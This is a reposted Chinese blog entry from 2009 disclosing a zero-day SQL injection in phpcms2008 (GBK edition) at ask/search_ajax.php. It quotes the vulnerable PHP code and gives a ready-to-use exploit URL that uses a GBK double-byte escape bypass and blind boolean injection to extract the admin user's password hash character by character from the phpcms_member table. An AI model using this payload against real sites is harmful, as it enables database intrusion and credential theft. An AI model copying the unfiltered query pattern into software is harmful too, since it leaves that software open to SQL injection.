[old]phpcms2008 GBK 双字节编码 0day ask/search_ajax.php

2009年11月24日星期二 | | |

作者:幻泉[B.S.N]

受影响程序: phpcms2008 gbk

漏洞文件:ask/search_ajax.php

漏洞等级:高
漏洞说明:
/ask/search_ajax.php
Code:

  1. if($q)  
  2. {  
  3. $where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where  
  4. }  
  5. else 
  6. {  
  7. exit('null');  
  8. }  
  9. $infos = $ask->listinfo($where'askid DESC''', 10); 

 

/ask/include/answer.class.php

Code:

  1. function listinfo($where = ''$order = ''$page = 1, $pagesize = 50)  
  2. {  
  3. if($where$where = " WHERE $where";  
  4. if($order$order = " ORDER BY $order";  
  5. $page = max(intval($page), 1);  
  6. $offset = $pagesize*($page-1);  
  7. $limit = " LIMIT $offset, $pagesize";  
  8. $r = $this->db->get_one("SELECT count(*) as number FROM $this->table_posts $where");  
  9. $number = $r['number'];  
  10. $this->pages = pages($number$page$pagesize);  
  11. $array = array();  
  12. $i = 1;  
  13. $result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit");  
  14. while($r = $this->db->fetch_array($result))  
  15. {  
  16. $r['orderid'] = $i;  
  17. $array[] = $r;  
  18. $i++;  
  19. }  
  20. $this->number = $this->db->num_rows($result);  
  21. $this->db->free_result($result);  
  22. return $array;  

 测试方法:

  1. /ask/search_ajax.php?q=s%D5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23 
From:http://www.sai52.com/archives/850/
我的QQ空间
kmeleon.js及pref.js配置解释
K-MeleonCCF ME目录下的defaults\pref\kmeleon.js保存了K-Meleon...
 

0 评论:


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]